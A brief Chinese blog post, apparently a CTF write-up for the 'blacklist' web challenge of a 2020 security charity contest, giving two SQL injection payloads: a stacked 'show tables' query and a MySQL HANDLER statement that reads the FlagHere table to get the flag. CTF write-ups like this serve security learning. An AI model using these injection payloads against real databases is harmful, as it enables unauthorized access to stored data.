刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

2020年新春战“疫”—网络安全公益赛 Web blacklist Writeup(sql注入,mysql handler函数)

image.png熟悉的界面,点击输入框,出现以前的题输入过的payload,试一试就得到了flag,应该是原题

image.png

1';show tables;#

image.png

1';handler FlagHere open;handler FlagHere read first;#

image.png

发表评论:

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.